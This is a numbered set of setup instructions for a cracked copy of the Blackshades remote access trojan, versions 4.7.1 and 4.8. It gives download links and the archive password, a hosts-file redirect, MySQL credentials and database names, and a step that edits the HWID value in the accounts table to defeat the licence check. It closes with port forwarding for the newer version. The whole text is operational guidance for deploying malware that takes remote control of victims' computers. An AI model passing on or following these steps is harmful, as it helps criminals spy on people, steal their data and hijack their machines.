1. Download http://www.apachefriends.org/en/xampp-windows.html
  2. Download http://bshades.eu/4.7.1.rar password for the archive is blackshades
  3. Download http://bshades.eu/HWID.exe
  4. Download and install MySQL ODBC connector from here http://dev.mysql.com/downloads/connector/odbc
  5. I suggest you to go with older XAMPP 1.6.x because you will need VC++2008 redist or later to set leatest version to run.
  6. Add the following line in "hosts" file located here C:\WINDOWS\system32\drivers\etc
  7. blackshades.ru
  8. ***********************************************
  9. MySQL database details to set:
  10. Username: root
  11. Password: Uh77yerJ83nX
  12. Create database named -> bss_net
  13. bss_net is the database necessary for rat to authenticate;
  14. Create database named -> bs_fusion
  15. Create database named -> bs_proxy
  16. Creation of these two database will prevent error boxes, i didn\'t provided table structure because they are not needed for rat.
  17. Import the database backup files provided for each database respectively.
  18. ***********************************************
  19. Run HWID.exe and go to database bss_net in table accounts and replace hwid column value of -1111111111 with generated one (just paste it)
  20. Start file server4.7.1 (login server)
  21. ***********************************************
  22. Start Blackshades RAT 4.7.1 (client.exe) and login with username -> test and password -> test if needed
  23. ***********************************************
  24. For RAT version 4.8:
  25. Download this and install http://sourceforge.net/projects/pjs-passport/
  26. forward these ports using TCP protocol:
  27. ==>
  28. ==>
  29. ***********************************************
  30. For older version:
  31. DB password is the same, its just port forwarding that is necessary but I might release all login servers.
  32. Only 4.8 has different database password but like described before, it can be bypassed with port forwarding, use netsat to examine in details.